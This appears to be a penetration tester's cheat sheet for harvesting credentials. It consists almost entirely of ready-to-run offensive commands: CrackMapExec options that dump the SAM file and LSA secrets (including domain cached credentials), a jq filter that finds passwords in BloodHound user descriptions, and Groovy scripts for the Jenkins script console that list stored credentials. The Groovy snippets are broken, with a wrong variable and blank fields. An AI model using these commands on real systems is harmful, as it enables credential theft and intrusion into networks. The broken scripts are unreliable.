- CrackMapExec - `cme smb –u ValidUser –p ValidPass --sam` - Dumps the SAM file - local users only (not domain) - `cme smb –u ValidUser –p ValidPass --lsa` - Dump LSA secrets from the registry - includes Domain Cached Credentials - Checking BloodHound data for credentials in user descriptions - `cat | jq '.data[].Properties | select(.enabled == true) | .name + " " + .description'` - Extracting Jenkins credentials from script console ```Groovy /* All Credentials */ import jenkins.* import jenkins.model.* import hudson.* import hudson.model.* def jenkinsCredentials = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( com.cloudbees.plugins.credentials.Credentials.class, Jenkins.instance, null, null ); for (creds in jenkinsCredentials) { println(jenkinsCredentials.id) } /* Specific Credentials */ import jenkins.* import jenkins.model.* import hudson.* import hudson.model.* def jenkinsCredentials = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( com.cloudbees.plugins.credentials.Credentials.class, Jenkins.instance, null, null ); for (creds in jenkinsCredentials) { if(creds.id == ""){ println(creds.) println(creds.) } } ```